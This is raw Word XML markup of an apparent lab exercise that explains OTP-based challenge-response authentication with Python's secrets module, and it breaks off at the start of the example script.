style="position:absolute;margin-left:1in;margin-top:23.35pt;width:486.1pt;height:1.65pt;z-index:-15723520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&#10;AACuBwAAAAA=&#10;">
                <v:shape id="Graphic 60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W2wAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/JbsIw&#10;EL0j8Q/WVOIGTjkADTgIsag9UkDqdYgnC8TjEBsIfH19QOL49PbZvDWVuFHjSssKPgcRCOLU6pJz&#10;BYf9pj8B4TyyxsoyKXiQg3nS7cww1vbOv3Tb+VyEEHYxKii8r2MpXVqQQTewNXHgMtsY9AE2udQN&#10;3kO4qeQwikbSYMmhocCalgWl593VKDge9Oqy/RqOdf7I/tbfpycd6alU76NdTEF4av1b/HL/aAWj&#10;sD58CT9AJv8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAd9MVtsAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 61" o:spid="_x0000_s1028" style="position:absolute;left:61704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7r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 62" o:spid="_x0000_s1029" style="position:absolute;left:3;top:7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AwvxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvQv9DeEJvNasFtVujaKHQHlRcy0Jvj81zs7h5WZJUt/++EQoeh5n5hlmsetuKC/nQOFYwHmUg&#10;iCunG64VfB3fn+YgQkTW2DomBb8UYLV8GCww1+7KB7oUsRYJwiFHBSbGLpcyVIYshpHriJN3ct5i&#10;TNLXUnu8Jrht5STLptJiw2nBYEdvhqpz8WMVlN6b9X633dDnc/fdzLLyZRNKpR6H/foVRKQ+3sP/&#10;7Q+tYDqB25f0A+TyDwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADjYDC/EAAAA2w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63" o:spid="_x0000_s1030" style="position:absolute;left:61704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5r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 64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7r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 65" o:spid="_x0000_s1032" style="position:absolute;left:3;top:175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n/xQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gQvUjdKTUvqGkpEEHqxqaU9PrKvSTD7dsmuGv99tyB4HGbmG2aVD6YTZ+p9a1nBfJaA&#10;IK6sbrlWcPjcPr6A8AFZY2eZFFzJQ75+GK0w0/bCH3QuQy0ihH2GCpoQXCalrxoy6GfWEUfv1/YG&#10;Q5R9LXWPlwg3nVwkSSoNthwXGnRUNFQdy5OJlNQVrVl8udNh/7T/vm7fp5ufZ6Um4+HtFUSgIdzD&#10;t/ZOK0iX8P8l/gC5/gMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDnu2n/xQAAANs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EAD054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4717BB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78"/>
        <w:ind w:right="388"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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challenge-response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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one-time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">passwords (OTP) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71664C74" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273" w:line="247" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim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challenge-response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one-time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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(OTP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and Python‟s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-40"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>module for secure OTP generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8FF127" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="263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39235E7A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEC4B2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300C196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5B3705B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68E23482" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000"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B19AAA0" wp14:editId="12B37B98">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>296309</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2032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15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1891A" id="Group 66" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.35pt;width:486.1pt;height:1.6pt;z-index:-15723008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&#10;AAAArwcAAAAA&#10;">
                <v:shape id="Graphic 67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o3CwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8ARvmupB3a5RZFX06Gphr8/m2XZtXmoTtfrrzYLgcZiZb5jJrDGluFLtCssK+r0IBHFq&#10;dcGZgmS/6o5BOI+ssbRMCu7kYDb9aE0w1vbGP3Td+UwECLsYFeTeV7GULs3JoOvZijh4R1sb9EHW&#10;mdQ13gLclHIQRUNpsOCwkGNF3zmlp93FKDgkenHefg5GOrsff5frvwcd6KFUp93Mv0B4avw7/Gpv&#10;tILhCP6/hB8gp08AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA+DqNwsMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,19672r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 68" o:spid="_x0000_s1028" style="position:absolute;left:61704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3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J5exAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8AreNNsKtq5G0YKgB1tqZcHbY/PcLN28LEnU9d8bQehxmJlvmOm8s404kw+1YwWvgwwE&#10;cel0zZWC/e+q/wEiRGSNjWNScKUA89nz0xRz7S78Q+ddrESCcMhRgYmxzaUMpSGLYeBa4uQdnbcY&#10;k/SV1B4vCW4b+ZZlI2mx5rRgsKVPQ+Xf7mQVFN6bxffXdkmbYXuo37NivAyFUr2XbjEBEamL/+FH&#10;e60VjMZw/5J+gJzdAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADZ8nl7EAAAA2w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70" o:spid="_x0000_s1030" style="position:absolute;left:61704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6r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 7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1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2dWxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8ApeSs12ES1boxSLIHhZtxY9Pjavu6Gbl7CJuv77piB4HGbmG2a+HGwnztQH41jB6zgD&#10;QVw7bbhRsP9av7yBCBFZY+eYFFwpwHLx+DDHQrsL7+hcxUYkCIcCFbQx+kLKULdkMYydJ07ej+st&#10;xiT7RuoeLwluO5ln2VRaNJwWWvS0aqn+rU42UaZ+ZWz+7U/7clIeruvt8+dxptToafh4BxFpiPfw&#10;rb3RCmY5/H9JP0Au/gAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDti2dWxQAAANs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055DEE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6DF15338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5E126A6D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10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>Challenge-Response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Authentication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with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>OTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0389C4C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574E85FE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Challenge-response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spacing w:val="-2"/>
        </w:rPr>
        <w:t>where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A774599" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB6071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challenge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random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question)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client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B487C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 w:right="835"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20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respond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correctly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providing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correct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response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generated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 secret key and challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4358A74C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B16D7F7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this experiment, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OTP </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(One-Time Password) will be generated using Python's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets </w:t>
      </w:r>
      <w:r>
        <w:t>module,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cryptographically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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suitable for cryptographic applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667F1E6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB7F639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Installing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Required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Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086DB151" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73382446" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="230" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>The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secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="20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Python‟s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(Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>3.6+),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additional installation is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD485F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="332359C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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Script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for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OTP-Based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Challenge-Response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Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37D7FE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="54"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F662E05" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="36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script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0074AC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3288B1E4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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generates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challenge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(random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number).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D55A3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:before="1"/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challenge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secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B37F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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challenge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responds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OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354DD757" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29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verifies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correct.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B06B1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074C5EDD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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(otp_challenge_response.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFFE5B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="44"/>
        <w:ind w:left="360" w:right="7731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secrets import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072DBA23" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="360" w:right="78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real-world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applications,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be securely stored)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004A725D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SECRET_KEY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"SuperSecretKey"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311FC41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07125F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="360" w:right="783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one-time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(OTP)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based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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5896AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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generate_otp(challenge,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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secret_key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67999F0C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="840" w:right="114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Combine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 otp_input = challenge + secret_key</w:t>
      </w:r>
    </w:p>
